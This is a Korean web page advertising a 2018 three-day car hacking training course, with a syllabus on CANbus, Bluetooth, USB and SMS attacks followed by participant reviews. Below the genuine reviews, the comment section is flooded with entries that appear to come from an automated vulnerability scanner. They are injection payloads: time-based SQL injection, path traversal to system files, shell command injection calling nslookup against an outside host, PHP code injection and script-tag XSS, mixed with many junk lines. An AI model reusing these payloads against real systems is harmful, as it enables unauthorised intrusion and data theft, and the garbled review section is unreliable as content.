Car Hacking Training (부제 : 몽이와 함께하는 자동차 해킹)
 
강의 요약

    최근 스마트카, 커넥티드카, 자율주행차와 같은 키워드들과 함께 차량에 대한 관심이 나날이 증가되고 있습니다.
    하지만 이처럼 자동차의 기능이 확장되고 특히 인터넷과 주변기기에 연결될 수록 해커로부터 공격을 당할 수 있는 접점은 더욱 다양해
    지며, 자동차에 대한 해킹 공격은 자칫 인명사고로도 이어질 수 있기 때문에 보안에 대한 이해가 더욱 중요한 분야라고 할 수 있습니다.
    본 트레이닝에선 자동차에 대한 다양한 공격 벡터들을 살펴보고, 이들 중 특히 CANbus, Bluetooth, USB, 그리고 SMS 공격 방식에
    대하여 실습들과 함께 자세히 배워봅니다. 저희 Grayhash는 2015년부터 10종 이상의 다양한 차량용 장비들에 대한 보안 컨설팅을
    수행해 왔으며, 이 경험을 기반으로 자동차 보안에 대한 Insight를 넓혀 드립니다.
기본 정보

    • 강의명 : Car Hacking Training (부제 : 몽이와 함께하는 자동차 해킹)
    • 강사 : 정구홍 (mongii)
    • 강의 일정 : 2018년 3월 26일(월) ~ 3월 28일(수)
    • 강의 시간 : 매일 오전 10시~오후 6시
    • 강의 장소 : 분당구 정자동 Grayhash 트레이닝룸 [위치보기]
    • 수강 정원 : 10명 (최소 인원 5명)
    • 강의 비용 : 2,000,000원 (VAT 별도)
    • 강의 수료증 제공
    • 중식 및 다과 제공
    
주요 교육 내용

    • CANbus Hacking
    • Bluetooth based Car Hacking
    • USB based Car Hacking
    • SMS based Car Hacking
    • 주요 자동차 해킹 사례 분석
    
상세 교육 내용


    1일차 - CANbus Hacking
    
    • CAN(Controller Area Network) 통신의 이해
    • ECU(Electronic control unit)의 이해
    • CANbus lines 연결하기 실습
    • CANbus Hacking Tool 개발 실습
    • CAN Message Sniffing 실습
    • CAN Message 송신(Injection) 실습
    • CAN Message 포맷의 구조 이해
    • CANbus Controller와 Transceiver의 이해
    • Car Network 종류들의 이해
    • 차량진단 표준의 이해와 해킹 관점에서의 활용
    • 실제 차량의 OBD-II 포트와 연결하기 실습
        
    • 주요 자동차 해킹 사례 및 취약점 발생 원리 분석
        • 2010 - Experimental Security Analysis of a Modern Automobile
        • 2011 - Comprehensive Experimental Analyses of Automotive Attack Surfaces
        • 2013 - Adventures in Automotive Networks and Control Units
        • 2014 - A Survey of Remote Automotive Attack Surfaces
        • 2015 - Remote Exploitation of an Unaltered Passenger Vehicle
        • 2015 - How to Hack a Tesla Model S
        • 2015 - Broadcasting Your Attack: Security Testing DAB Radio In Cars
        • 2015 - Drive it like you Hacked it: New Attacks and Tools to Wireles
        • 2016 - Advanced CAN injection technique for vehicle networks
        • 2016 - Car Hacking Research: Remote Attack Tesla Motors
        • 2017 - The CIA may be hacking cars

    • 자동차 Attack Vector의 이해
        • Hardware Vulnerabilities Analysis (UART/JTAG/OBD-II)
        • Audio/Video/Navigation Device Vulnerabilities Analysis
        • Smart Device Vulnerabilities Analysis
        • Telematics Device Vulnerabilities Analysis
        • ETC : Web Browser, Smartphone APP, Radio Data System, Cloud Server
    

    
    2일차 - Infotainment System Hacking

    • Bluetooth based Car Hacking
        • Bluetooth 기초 (master/slave, piconet, bluetooth stack)
        • Bluetooth module 사용 실습
        • Bluetooth Packet 송수신 실습
        • Bluetooth Packet sniffing 실습
        • Bluetooth Profile의 이해
        • Bluetooth Profile Scanning 실습
        • 차량용 디바이스의 주요 Profiles
        • 차량의 주요 Bluetooth 관련 기능들
        • 차량의 Bluetooth Packet Sniffing 및 분석
        • 차량 Bluetooth의 주요 Attack Vectors
        • Bluetooth Packet 변조 실습

    • USB based Car Hacking
        • 차량 USB의 주요 Attack Vectors
        • USB(Universal Serial Bus) 기초
        • Beagle USB 480을 이용한 USB Packet Sniffing
        • 주요 USB Packets 분석(Device, Configuration, Interface, Endpoint, String Descriptor)
        • USB Packet Fuzzing 환경 구축
        • OrangePi를 이용한 USB fuzzer 개발
        • Linux USB Gadget의 이해
        • USB Stack Fuzzing
        • USB based OS File system Fuzzing
        • USB based Multi-media file Fuzzing
    
    
    
    3일차 - Telematics System Hacking

    • TCU(Telematics Control Unit)의 이해
    • SMS PDU 포맷의 이해
    • PDU 포맷 분석 실습
    • PDU 데이터를 이용한 SMS 전송 실습
    • Modem device를 이용한 SMS 전송 실습
    • 보내는 SMS와 받은 SMS의 PDU 필드 값 비교
    • MMS(Multimedia Messaging Service) 전송하기
    • PDU-Header 및 TP-UDHI 필드의 이해
    • IEI(Identity Element Identifie)와 Application Port의 이해
    • SMS Hacking 사례 분석
    • SMS Fuzzing 환경 구축
    • Android telephony stack의 이해
    • SMS 수신 시의 데이터 흐름 경로 분석 및 Fuzzing 지점 선정
    • SMS Fuzzer 개발 방법의 이해
    • Fake BTS를 이용한 SMS attack (USRP + OpenBTS)
    

    * 상기 1~3일차 교육 내용은 상황에 따라 일부 변동될 수 있습니다.

교재 및 실습 장비 목록

    [교재]
    • 강의 PPT

    [기타]
    • 수료증(certificate) 발급

교육자 준비사항

    • 노트북
    • Software : PowerPoint 혹은 Acrobat Reader, Vmware workstation/fusion/player

트레이닝 사진


* 위 사진의 차량 및 장비들은 취약점과 무관하며, 본 교육은 특정 차량 모델이나 장비를 Targeting하지 않습니다.


트레이닝 수강 후기
    * 김근학자동차 해킹의 접근방법을 알수 있는 정말 유익한 트레이닝이었습니다.
지금까지 공개된 공격 방법에 대한 소개부터 시작해서 자동차에서 접근할 수 있는 엔트리포인트의 공격방법에대한 실습까지!
실제 자동차의 데시보드를 이용한 CAN통신 실습은 자동차 해킹의 무서움을 알게해주는 엄청난 실습이었습니다.
SMS를 이용한 해킹에서는 상상하지 못한 SMS를 이용한 해킹방법을 배울수 있었습니다.
블루투스와 USB를 이용한 멀티미디어 기기 해킹을 통해 IoT에 대한 해킹 방법까지 배울수 있었습니다.
마지막에 그래이헤시의 해킹용 자동차의 직접 CAN데이터를 조작하는 장면, 그걸 달리는 차에서 구현한 모습은 더욱더 자동차 해킹의 무서움을 느낄수 있었습니다. ㅎㅎㅎ;;;;;
열정적으로 강의해주신 몽강사님! 감사합니다!
    * KMG- 이론과 실습 밸런스 짱이었고, 해볼 수 있는게 많아서 업무(?취미생활!)에 바로 적용 가능할 것 같습니다 ㅎㅎ
- 각자 만든 실습장비를 서로 연결하여 CAN을 구성하고,여러사람의 데이터를 Sniffing 할 수 있어 잼났습니다.
- 3일짜리 구성으로 시간내기도 좋고 빡시게 잘 배웠습니다.
- 컨설팅 관점에서 접근하고 분석하는 방법에 대해 생생한 경험을 전해들을 수 있어서 좋았습니다~~
    * *제*관련 내용은 국내 교육 기관에서 접하기 어려운 기술들 입니다. 깊이 있는 내용을 다루면서도 전문가가 아니더라도 교육을 듣고 스스로 필요한 부분을 찾아서 공부할 수 있도록 해줍니다. 꼭 차량이 아니더라도 임베디드 장치(드론, 스마트 가전 등) 전반에 대한 접근 방법을 익히실 수 있습니다. 추천합니다.
    * CSH자동차 해킹과 다양한 지식을 얻을수 있는 시간이었습니다.
유익한 강의였습니다.
    * 이**정리할 내용이 많아서 정리하느라 인제야 후기를 올리네요. ㅜ 결론부터 말하면 다년간 자동차 해킹을 연구하신 강사님의 노하우를 들을 수 있는 정말 좋은 강의라 강력히 추천해 드립니다. :) 자동차 해킹을 하는 A to Z 전 과정을 알아볼 수 있는 트레이닝이었습니다. 해외 자동차 해킹 사례와 주요 공격벡터들을 알아보고, 해당 공격 벡터들을 어떻게 공격할 수 있는지 알 수 있었습니다. 자동차 해킹이라면 빠질 수 없는 CAN버스 해킹이 어떻게 이루어지는지 알아보고, 직접 차량 장비와 실제 차량을 대상으로 실습을 해볼 수 있었습니다. 그리고 공격 벡터가 되는 USB, Bluetooth, SMS 등을 이용하여 어떻게 공격을 하고, 취약점을 찾을 수 있는지 알게 되어 정말 유익했습니다. USB, Bluetooth, SMS는 차량외에도 다양한 IOT장비에서도 사용이 되고 있기에 차량에 국한되지 않고 다른 IoT, 임베디드 장비에서 취약점을 찾을 때도 많은 도움이 될 것이라 생각됩니다. 자동차 뿐만아니라 IoT, 임베디드 장비 보안에 대해서 관심이 많은 분들에게도 추천해 드리고 싶은 트레이닝이었습니다.
    * 고광우자동차 해키에 관하여 전반적인 접근에 대해 생각해보고 이를 실습해보는 좋은 강의였습니다.
1일차에서 이루어진 CAN 메세지를 이용한 해킹을 통해서 각자동차에서 전자적으로 제어가 되는 장비들에 대한 공격을 시도해 보면서 실습을 진행 함으로써 찰리 밀러 논문이나 유튜브 동영상을 통해서 이루어진 공격을 실제 실증해 볼 수 있는 좋은 기회였습니다.
그리고 2일차 3일차 교육을 통해서 CAN 버스 해킹 외에도 블루투스,USB혹은 SMS등을 이용한 공격등을 실증해 봄으로써 자동차에 대한 다양한 공격 surface를 고려해 볼 수 있었습니다.
자동차에 대한 보안이나 컨설팅 관점에 대해 학습하시고 싶은 사람이 있다면 강력하게 추천하고 싶습니다.
    * 김주완이론과 실습이 병행되어 매우 즐겁게 들을 수 있었습니다. 관련 분야 최신 소식도 전해주어 좋았습니다.
    * 박경호자동차 해킹에 대해서 강사님의 해박한 지식을 공유할 수 있는 소중한 시간이었습니다. 아두이노를 기반으로 하고 있어서 쉽게 접근이 가능합니다. CANBUS의 빠른 데이터 취득 시 라즈베리파이로 시연해주시는데 앞으로는 이 부분들도 교육생들이 각자의 라즈베리파이로 같이 실습해볼 수 있었으면 좋겠습니다.(물론 시간이 넘 촉박하긴 합니다.^^) 타이트한 교육시간동안 자동차 해킹 및 다른 분야 해킹에 대해서도 많은 것을 배울 수 있어서 다른 분들께도 강추합니다.
    * SOL실제 차량 부품으로 실습해 볼 수 있어 최근 들어본 교육 중 가장 재미있었습니다. CAN통신 관련해서는 잘 몰랐던 분야를 처음부터 알려주셔서 따라가기에 좋았습니다. 하나의 차종의 장비를 다 연결하여 테스트가 가능하면 더 흥미진진할 것 같습니다. 또한 나머지 USB, 블루투스, SMS 등도 장비를 대상으로 직접 해볼 수 있으면 좋을 것 같습니다. (교육기간을 늘리는 것도 좋지 않을까요~ㅋㅋ) 흥미로운 강의였고, 관련 사례 및 논문을 소개해 주시는 것도 앞으로 공부하는데 도움이 될 것같습니다.
    * 안**자동차 해킹을 수행하는 전 과정(사전지식 습득 방법, 필요 정보 수집 방법, 장비 조작 및 해킹 방법)을 배울 수 있었기에 교육 후 스스로 복습하는데 어려움이 없었습니다. 또한 해킹을 수행하는 초기부터 구현까지 전 과정을 교육과정에서 담고 있기 때문에 교육에서 다루지 않는 새로운 파트에 대한 해킹에 응용하기에 어려움이 없습니다. 흥미롭긴 하지만 접근성이 용이하지 않은 자동차 해킹이라는 주제를 초보자도 쉽게 습득할 수 있도록 잘 풀어낸 교육이라 생각합니다. 많은것을 배우고 새로운 시각에서 접근하는 방법을 경험할 수 있는 값진 시간이었습니다.
    * 박*훈많은 이슈가 되고있는 자동차 해킹에 대해서 무언가 와닿게 배울수 있었던 유익한 시간이었습니다. 이론과 동향소개뿐만 아니라 가능한 부분은 간단한 실습까지 병행해서 진행해서 교육생도 무언가를 해나가고 있다는 느낌을 받을 수 있어서 좋았습니다. 다만 교육시간이 한정되어 sms, 블루투스 해킹 실습을 제대로 못해본게 아쉬움으로 남습니다. 교육내용과 교육방식으로 미루어볼때 자동차 해킹과정은 물론 다른 해킹과정들도 추천합니다.
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsqIgCqTv4U
    * JCfUZQsq-1 OR 2+879-879-1=0+0+0+1 --
    * JCfUZQsq-1 OR 2+752-752-1=0+0+0+1
    * JCfUZQsq-1' OR 2+160-160-1=0+0+0+1 --
    * JCfUZQsq-1' OR 2+225-225-1=0+0+0+1 or '365N2E6J'='
    * JCfUZQsq-1" OR 2+722-722-1=0+0+0+1 --
    * JCfUZQsqif(now()=sysdate(),sleep(15),0)
    * JCfUZQsq0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
    * JCfUZQsq0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
    * JCfUZQsq(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
    * JCfUZQsq-1; waitfor delay '0:0:15' --
    * JCfUZQsq-1); waitfor delay '0:0:15' --
    * JCfUZQsq1 waitfor delay '0:0:15' --
    * JCfUZQsqffbHTUYe'; waitfor delay '0:0:15' --
    * JCfUZQsq-5 OR 90=(SELECT 90 FROM PG_SLEEP(15))--
    * JCfUZQsq-5) OR 403=(SELECT 403 FROM PG_SLEEP(15))--
    * JCfUZQsq-1)) OR 482=(SELECT 482 FROM PG_SLEEP(15))--
    * JCfUZQsqIvAYjZnJ' OR 872=(SELECT 872 FROM PG_SLEEP(15))--
    * JCfUZQsqN0844i06') OR 881=(SELECT 881 FROM PG_SLEEP(15))--
    * JCfUZQsqS4mi592z')) OR 957=(SELECT 957 FROM PG_SLEEP(15))--
    * JCfUZQsq555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
    * JCfUZQsq555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
    * JCfUZQsq1'"
    * JCfUZQsq1%2527%2522
    * JCfUZQsq@@59pMW
    * JCfUZQsq555
    * JCfUZQsq555
    * VgIlS8vx555
    * -1 OR 2+995-995-1=0+0+0+1 --555
    * -1 OR 2+812-812-1=0+0+0+1555
    * -1' OR 2+46-46-1=0+0+0+1 --555
    * -1' OR 2+629-629-1=0+0+0+1 or 'GeCqiJJ6'='555
    * -1" OR 2+880-880-1=0+0+0+1 --555
    * if(now()=sysdate(),sleep(15),0)555
    * 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z555
    * 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z555
    * (select(0)from(select(sleep(15)))v)/*'+(select(0)f555
    * 1 waitfor delay '0:0:15' --555
    * 9TdbuVq1'; waitfor delay '0:0:15' --555
    * FgBAzin2' OR 122=(SELECT 122 FROM PG_SLEEP(15))--555
    * 4miNpowK') OR 10=(SELECT 10 FROM PG_SLEEP(15))--555
    * JIsv1QIT')) OR 179=(SELECT 179 FROM PG_SLEEP(15))-555
    * JCfUZQsq'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(555
    * 1'"555
    * 1%2527%2522555
    * @@SPOXW555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsqMlG2OorS
    * JCfUZQsq555
    * JCfUZQsq555
    * cDYX3FnB555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsqresponse.write(9724891*9583055)
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq'+response.write(9724891*9583055)+'
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq"+response.write(9724891*9583055)+"
    * JCfUZQsq555
    * JCfUZQsq<esi:include src="http://bxss.me/rpb.pn555
    * JCfUZQsq555
    * JCfUZQsq555
    * response.write(9886913*9713773)555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * '+response.write(9886913*9713773)+'555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq
    * JCfUZQsq555
    * JCfUZQsq555
    * "+response.write(9886913*9713773)+"555
    * JCfUZQsq${9999162+9999711}
    * JCfUZQsq555
    * JCfUZQsq12345'"\'\");|]*{
<>''💡
    * JCfUZQsq555
    * JCfUZQsq../../../../../../../../../../../../../../etc/passwd
    * TktsVUZzams=555
    * ${9999895+9999697}555
    * JCfUZQsq555
    * JCfUZQsq
    * JCfUZQsq555
    * JCfUZQsq../../../../../../../../../../../../../../windows/win.ini
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * 12345'"\'\");|]*{ <>''💡555
    * JCfUZQsq../555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555&n997397=v991288
    * JCfUZQsq555
    * ../../../../../../../../../../../../../../etc/pass555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq&n953324=v943731555
    * JCfUZQsq555
    * JCfUZQsq555
    * ../../../../../../../../../../../../../../windows/555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsqecho bzaqif$()\ rstrhq\nz^xyu||a #' &echo bzaqif$()\ rstrhq\nz^xyu||a #|" &echo bzaqif$()\ rstrhq\nz^xyu||a #
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * ../JCfUZQsq555
    * JCfUZQsq&echo puerqe$()\ nicyqe\nz^xyu||a #' &echo puerqe$()\ nicyqe\nz^xyu||a #|" &echo puerqe$()\ nicyqe\nz^xyu||a #
    * JCfUZQsq)
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq|echo zkrsmc$()\ hfnigl\nz^xyu||a #' |echo zkrsmc$()\ hfnigl\nz^xyu||a #|" |echo zkrsmc$()\ hfnigl\nz^xyu||a #
    * JCfUZQsq!(()&&!|*|*|
    * JCfUZQsq555
    * JCfUZQsq
    * JCfUZQsq555
    * JCfUZQsq(nslookup hityvrtictzhf2de36.bxss.me||perl -e "gethostbyname('hityvrtictzhf2de36.bxss.me')")
    * JCfUZQsq^(#$!@#$)(()))******
    * JCfUZQsq'.gethostbyname(lc('hitgf'.'gtdomcvr77818.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(75).chr(117).chr(80).'
    * JCfUZQsq'"()
    * JCfUZQsq1some_inexistent_file_with_long_name.jpg
    * JCfUZQsq$(nslookup hitxbisrcfrfs3cf13.bxss.me||perl -e "gethostbyname('hitxbisrcfrfs3cf13.bxss.me')")
    * JCfUZQsq555
    * )555
    * JCfUZQsq".gethostbyname(lc("hithe"."prnqsfjceadfe.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(74).chr(117).chr(87)."
    * JCfUZQsqHttp://bxss.me/t/fit.txt
    * JCfUZQsq555
    * JCfUZQsq&(nslookup hitotmpaxhxtu1cf63.bxss.me||perl -e "gethostbyname('hitotmpaxhxtu1cf63.bxss.me')")&'\"`0&(nslookup hitotmpaxhxtu1cf63.bxss.me||perl -e "gethostbyname('hitotmpaxhxtu1cf63.bxss.me')")&`'
    * !(()&&!|*|*|555
    * '"()555
    * '.gethostbyname(lc('hitpg'.'hdoooqjae7a31.bxss.me.555
    * JCfUZQsq555
    * JCfUZQsq|(nslookup hitxezdzpqxupc1136.bxss.me||perl -e "gethostbyname('hitxezdzpqxupc1136.bxss.me')")
    * ^(#$!@#$)(()))******555
    * JCfUZQsq555
    * ".gethostbyname(lc("hitpu"."jtiftisu28b2c.bxss.me.555
    * JCfUZQsqbxss.me
    * JCfUZQsq555
    * JCfUZQsq`(nslookup hitqigmyexpkbf817f.bxss.me||perl -e "gethostbyname('hitqigmyexpkbf817f.bxss.me')")`
    * JCfUZQsq555
    * JCfUZQsq555
    * http://some-inexistent-website.acu/some_inexistent555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq;(nslookup hitjoduqvlnxj62878.bxss.me||perl -e "gethostbyname('hitjoduqvlnxj62878.bxss.me')")|(nslookup hitjoduqvlnxj62878.bxss.me||perl -e "gethostbyname('hitjoduqvlnxj62878.bxss.me')")&(nslookup hitjoduqvlnxj62878.bxss.me||perl -e "gethostbyname('hitjoduqvlnxj62878.bxss.me')")
    * JCfUZQsq555
    * JCfUZQsq555
    * 1some_inexistent_file_with_long_name.jpg555
    * JCfUZQsq555
    * JCfUZQsq555
    * echo hphris$()\ scfwnp\nz^xyu||a #' &echo hphris$(555
    * JCfUZQsq555
    * JCfUZQsq555
    * Http://bxss.me/t/fit.txt555
    * JCfUZQsq555
    * JCfUZQsq555
    * &echo upegxm$()\ jgkxqr\nz^xyu||a #' &echo upegxm$555
    * JCfUZQsq555
    * JCfUZQsqHttP://bxss.me/t/xss.html?%00
    * http://bxss.me/t/fit.txt?.jpg555
    * JCfUZQsq555
    * JCfUZQsq555
    * |echo cizlfo$()\ hpggob\nz^xyu||a #' |echo cizlfo$555
    * JCfUZQsq"+"A".concat(70-3).concat(22*4).concat(99).concat(81).concat(100).concat(71)+(require"socket"
Socket.gethostbyname("hitqy"+"jryawpfm9066f.bxss.me.")[3].to_s)+"
    * JCfUZQsqbxss.me/t/xss.html?%00
    * bxss.me555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq'+'A'.concat(70-3).concat(22*4).concat(111).concat(86).concat(109).concat(65)+(require'socket'
Socket.gethostbyname('hitwl'+'bdzomsxz1c4b9.bxss.me.')[3].to_s)+'
    * (nslookup hitlxqudtokup26749.bxss.me||perl -e "get555
    * HttP://bxss.me/t/xss.html?%00555
    * JCfUZQsq555
    * JCfUZQsq555
    * JCfUZQsq555
    * "+"A".concat(70-3).concat(22*4).concat(119).concat555
    * $(nslookup hitdyihvnpnzdde503.bxss.me||perl -e "ge555
    * bxss.me/t/xss.html?%00555
    * JCfUZQsq555
    * JCfUZQsqleave_comment.php
    * JCfUZQsq;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
    * '+'A'.concat(70-3).concat(22*4).concat(118).concat555
    * JCfUZQsq555
    * &(nslookup hitilzpajfikh4c64c.bxss.me||perl -e "ge555
    * JCfUZQsq)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
    * JCfUZQsqleave_comment.php
    * JCfUZQsq';print(md5(31337));$a='
    * JCfUZQsq555
    * JCfUZQsq555
    * |(nslookup hitlnemnelvji1a602.bxss.me||perl -e "ge555
    * ))))))))))))))))))))))))))))))))))))))))))))))))))555
    * JCfUZQsqleave_comment.php/.
    * JCfUZQsq";print(md5(31337));$a="
    * JCfUZQsq555
    * JCfUZQsq/xfs.bxss.me
    * `(nslookup hitjdrqcpttnd8037e.bxss.me||perl -e "ge555
    * JCfUZQsq555
    * leave_comment.php555
    * JCfUZQsq${@print(md5(31337))}
    * /xfs.bxss.me555
    * JCfUZQsq555
    * ;(nslookup hitfvlusukkuoe9983.bxss.me||perl -e "ge555
    * JCfUZQsq555
    * leave_comment.php555
    * JCfUZQsq${@print(md5(31337))}\
    * JCfUZQsq555
    * JCfUZQsq555
    * leave_comment.php/.555
    * JCfUZQsq'.print(md5(31337)).'
    * JCfUZQsq'"
    * JCfUZQsq555
    * ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))555
    * JCfUZQsq<!--
    * JCfUZQsq555
    * ';print(md5(31337));$a='555
    * '"555
    * JCfUZQsq555
    * ";print(md5(31337));$a="555
    * <!--555
    * JCfUZQsq555'"()&%<acx><ScRiPt >dgE4(9028)</ScRiPt>
    * ${@print(md5(31337))}555
    * JCfUZQsq'"()&%<acx><ScRiPt >dgE4(9450)</ScRiPt>
    * ${@print(md5(31337))}\555
    * JCfUZQsq5559251600
    * '.print(md5(31337)).'555
    * JCfUZQsq'"()&%<acx><ScRiPt >dgE4(9858)555
    * '"()&%<acx><ScRiPt >dgE4(9615)</ScR555
    * JCfUZQsq9559913555
    * JCfUZQsq555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555
    * pHqghUme555bQQIRAeY
    * pHqghUme555
    * pHqghUme-1 OR 2+908-908-1=0+0+0+1 --
    * pHqghUme-1 OR 2+417-417-1=0+0+0+1
    * pHqghUme-1' OR 2+770-770-1=0+0+0+1 --
    * pHqghUme-1' OR 2+762-762-1=0+0+0+1 or 'iHYINRSj'='
    * pHqghUme-1" OR 2+360-360-1=0+0+0+1 --
    * pHqghUme555*if(now()=sysdate(),sleep(15),0)
    * pHqghUme5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
    * pHqghUme5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
    * pHqghUme(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
    * pHqghUme555-1; waitfor delay '0:0:15' --
    * pHqghUme555-1); waitfor delay '0:0:15' --
    * pHqghUme555-1 waitfor delay '0:0:15' --
    * pHqghUme5556YTHxYA6'; waitfor delay '0:0:15' --
    * pHqghUme555-1 OR 675=(SELECT 675 FROM PG_SLEEP(15))--
    * pHqghUme555-1) OR 876=(SELECT 876 FROM PG_SLEEP(15))--
    * pHqghUme555-1)) OR 339=(SELECT 339 FROM PG_SLEEP(15))--
    * pHqghUme555ZeHXIYzv' OR 767=(SELECT 767 FROM PG_SLEEP(15))--
    * pHqghUme555ch41CQcy') OR 265=(SELECT 265 FROM PG_SLEEP(15))--
    * pHqghUme55566d41mK1')) OR 28=(SELECT 28 FROM PG_SLEEP(15))--
    * pHqghUme555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
    * pHqghUme555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
    * pHqghUme555'"
    * pHqghUme555%2527%2522\'\"
    * pHqghUme@@DRbSO
    * pHqghUme555
    * pHqghUme555
    * pHqghUmeuxDuHWBW555
    * pHqghUme555
    * -1 OR 2+584-584-1=0+0+0+1 --555
    * -1 OR 2+308-308-1=0+0+0+1555
    * -1' OR 2+628-628-1=0+0+0+1 --555
    * -1' OR 2+139-139-1=0+0+0+1 or 'NXDe2IgN'='555
    * -1" OR 2+768-768-1=0+0+0+1 --555
    * if(now()=sysdate(),sleep(15),0)555
    * pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'555
    * pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"555
    * (select(0)from(select(sleep(15)))v)/*'+(select(0)f555
    * pHqghUme-1 waitfor delay '0:0:15' --555
    * pHqghUmeqNydjR6P'; waitfor delay '0:0:15' --555
    * pHqghUmepVDYOpV6' OR 223=(SELECT 223 FROM PG_SLEEP555
    * pHqghUmeGyFxQlWD') OR 810=(SELECT 810 FROM PG_SLEE555
    * pHqghUmephEv74Zl')) OR 892=(SELECT 892 FROM PG_SLE555
    * pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(555
    * pHqghUme'"555
    * pHqghUme%2527%2522\'\"555
    * @@vylf8555
    * pHqghUme555
  * 작성자:       * 소속:       * 이메일:
   (성함, 혹은 닉네임을 입력해주세요. 입력해주신 정보들 중 작성자와 후기만 공개됩니다.)